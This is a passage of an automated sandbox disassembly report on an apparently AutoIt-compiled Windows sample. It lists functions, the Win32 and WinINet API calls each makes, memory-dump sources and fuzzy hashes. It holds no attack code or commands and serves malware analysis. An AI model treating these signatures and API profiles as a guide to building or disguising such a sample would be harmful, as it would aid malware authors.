                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1B8
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1FD
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B212
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B21D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
                                                                    • Instruction ID: 0cf3dbd4bf576384e707974bc5eb6fed9eae98ce8a4ad620338def36857801da
                                                                    • Opcode Fuzzy Hash: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
                                                                    • Instruction Fuzzy Hash: 1B31CCB2568208BFDB20EF24DD98F6D7BADBF65721F108109FA14D6190D7B4DA809F60
                                                                    Function 00912C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00912C94
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 00912CA0
                                                                    • _free.LIBCMT ref: 00912CAB
                                                                    • _free.LIBCMT ref: 00912CB6
                                                                    • _free.LIBCMT ref: 00912CC1
                                                                    • _free.LIBCMT ref: 00912CCC
                                                                    • _free.LIBCMT ref: 00912CD7
                                                                    • _free.LIBCMT ref: 00912CE2
                                                                    • _free.LIBCMT ref: 00912CED
                                                                    • _free.LIBCMT ref: 00912CFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
                                                                    • Instruction ID: e14753dac2e16fa8455a3e11404f128b18a19feb055b27da55dcb0e7ef416de1
                                                                    • Opcode Fuzzy Hash: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
                                                                    • Instruction Fuzzy Hash: 5611667660010CAFCB02FF58D942DDD3BA9FF45360F5145A5FA585F222D631EAA09B90
                                                                    Function 008E1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008E1459
                                                                    • OleUninitialize.OLE32(?,00000000), ref: 008E14F8
                                                                    • UnregisterHotKey.USER32(?), ref: 008E16DD
                                                                    • DestroyWindow.USER32(?), ref: 009224B9
                                                                    • FreeLibrary.KERNEL32(?), ref: 0092251E
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0092254B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: bf8f5b28fd530d39e9493f2189dd0d14850ef324098813e9b4c2b6e11e53624a
                                                                    • Instruction ID: 02013cef18a40acc03f4c57eaff4ee451065160091027f607a79571a06703b10
                                                                    • Opcode Fuzzy Hash: bf8f5b28fd530d39e9493f2189dd0d14850ef324098813e9b4c2b6e11e53624a
                                                                    • Instruction Fuzzy Hash: 50D1A071701262DFCB29EF15D899A29F7A4FF06700F1481ADE54AAB266CB30ED12CF51
                                                                    Function 00957DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00957FAD
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00957FC1
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00957FEB
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00958005
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958017
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958060
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009580B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                    • String ID: *.*
                                                                    • API String ID: 769691225-438819550
                                                                    • Opcode ID: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
                                                                    • Instruction ID: e3fd8b3d53bcd208d009c212489cd07463d19cc7ba447c093632459f92bf3a8b
                                                                    • Opcode Fuzzy Hash: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
                                                                    • Instruction Fuzzy Hash: E28190725083419BCB20DF56D845AAAF3E8BB85311F144C5EFC85D7260EB34DE4D8B52
                                                                    Function 008E5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 008E5C7A
                                                                      • Part of subcall function 008E5D0A: GetClientRect.USER32(?,?), ref: 008E5D30
                                                                      • Part of subcall function 008E5D0A: GetWindowRect.USER32(?,?), ref: 008E5D71
                                                                      • Part of subcall function 008E5D0A: ScreenToClient.USER32(?,?), ref: 008E5D99
                                                                    • GetDC.USER32 ref: 009246F5
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00924708
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00924716
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0092472B
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00924733
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009247C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
                                                                    • Instruction ID: f459a7a427666343664f9d688d80406d02b1a59f98d127a5e1753c2340b8962d
                                                                    • Opcode Fuzzy Hash: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
                                                                    • Instruction Fuzzy Hash: C6710431500249DFCF21CF64E984AFA3BB9FF4A324F244269ED659A1AAC7319C81DF50
                                                                    Function 0095359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009535E4
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • LoadStringW.USER32(009B2390,?,00000FFF,?), ref: 0095360A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString$_wcslen
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 4099089115-2391861430
                                                                    • Opcode ID: 76ab95535a791d4ceb4a9ef5697f1e7ca07a94b7ea009307d0b86f9d43203410
                                                                    • Instruction ID: d9dd0f9dc69d9fe614366c1bad60d1bb7750b34158ba56aa9acb4e9c4654fadc
                                                                    • Opcode Fuzzy Hash: 76ab95535a791d4ceb4a9ef5697f1e7ca07a94b7ea009307d0b86f9d43203410
                                                                    • Instruction Fuzzy Hash: 4E519C72C00249BADF15EBA5DC42EEEBB78FF45340F544125F505B21A1EB302B98DBA1
                                                                    Function 0095C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C29A
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C2CA
                                                                    • GetLastError.KERNEL32 ref: 0095C322
                                                                    • SetEvent.KERNEL32(?), ref: 0095C336
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0095C341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
                                                                    • Instruction ID: 4293d18563b53860700ae48e82032d2879504f4939a338aae23fe367051d770d
                                                                    • Opcode Fuzzy Hash: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
                                                                    • Instruction Fuzzy Hash: 9B316DF2504308AFD721DF668C89AAB7AFCEB49745F10851DF84A92211DB34DD489B60
                                                                    Function 0094989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00923AAF,?,?,Bad directive syntax error,0097CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009498BC
                                                                    • LoadStringW.USER32(00000000,?,00923AAF,?), ref: 009498C3
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00949987
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 858772685-4153970271
                                                                    • Opcode ID: 4514b9d7480fd7e4d098d2ad3156248d9bdce2998d832eaa33fb50fb4cc70e04
                                                                    • Instruction ID: 59195ba2c020c15fb384158f5693e5e2e07427437e3bef362e34760ef28e4804
                                                                    • Opcode Fuzzy Hash: 4514b9d7480fd7e4d098d2ad3156248d9bdce2998d832eaa33fb50fb4cc70e04
                                                                    • Instruction Fuzzy Hash: DE21A332C0025EBBCF15AF94CC0AEEE7779FF19304F044829F515A60A2EB719A58DB61
                                                                    Function 0094209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32 ref: 009420AB
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 009420C0
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0094214D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1290815626-3381328864
                                                                    • Opcode ID: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
                                                                    • Instruction ID: 98fbf9e1045b1022db972303336458c94e90937eaa2e856b8f3de4a620b66834
                                                                    • Opcode Fuzzy Hash: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
                                                                    • Instruction Fuzzy Hash: F8110AB678C707B9F6152324DC06DE6379CEB4A729B61001AF704A50D1EA6558415664
                                                                    Function 00918D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
                                                                    • Instruction ID: 17826d97d57f9a2a409723b572868fd289e4cfc2c62325ecba2a569268ee59c6
                                                                    • Opcode Fuzzy Hash: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
                                                                    • Instruction Fuzzy Hash: BFC1E274F0424DAFDB21EFA8D851BEEBBB4AF4D310F184199E415A7392C7349982DB60
                                                                    Function 0091CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                    • String ID:
                                                                    • API String ID: 1282221369-0
                                                                    • Opcode ID: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
                                                                    • Instruction ID: b10a61167c78928759c3c90e78c1cb754dd7cdf11b36f0edd9d2007a50960797
                                                                    • Opcode Fuzzy Hash: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
                                                                    • Instruction Fuzzy Hash: D86138B1B4430CAFDB21AFB49941BEA7BA9AF85320F04416DF941973C1D6319D82D750
                                                                    Function 009750D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00975186
                                                                    • ShowWindow.USER32(?,00000000), ref: 009751C7
                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 009751CD
                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 009751D1
                                                                      • Part of subcall function 00976FBA: DeleteObject.GDI32(00000000), ref: 00976FE6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0097520D
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0097521A
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0097524D
                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00975287
                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00975296
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                    • String ID:
                                                                    • API String ID: 3210457359-0
                                                                    • Opcode ID: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
                                                                    • Instruction ID: 1c1a24fba45bb68cc614f4c831a1d6aef6f4f3d3a593ee36e7cbf6ea0ad764b9
                                                                    • Opcode Fuzzy Hash: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
                                                                    • Instruction Fuzzy Hash: 8051C272A58A08BEEF609F24CC46B983B69FB05322F55C005F62C962E1C7B5E980DB41
                                                                    Function 008F8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00936890
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009368A9
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009368B9
                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009368D1
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009368F2
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00936901
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093691E
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0093692D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
                                                                    • Instruction ID: 9c4f5e64df5b05725436444845131057af769675a71874d03199d90dee5110ef
                                                                    • Opcode Fuzzy Hash: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
                                                                    • Instruction Fuzzy Hash: 195168B1610209EFDB24CF25CC95BAA7BB5FB48760F104518FA56D72A0DB70E990DB50
                                                                    Function 0095C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C182
                                                                    • GetLastError.KERNEL32 ref: 0095C195
                                                                    • SetEvent.KERNEL32(?), ref: 0095C1A9
                                                                      • Part of subcall function 0095C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
                                                                      • Part of subcall function 0095C253: GetLastError.KERNEL32 ref: 0095C322
                                                                      • Part of subcall function 0095C253: SetEvent.KERNEL32(?), ref: 0095C336
                                                                      • Part of subcall function 0095C253: InternetCloseHandle.WININET(00000000), ref: 0095C341
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 337547030-0
                                                                    • Opcode ID: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
                                                                    • Instruction ID: 0f2b23a9740c96e01cc2da8f24400dd22d5ccdb5deb80c8f0175f09d98898de9
                                                                    • Opcode Fuzzy Hash: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
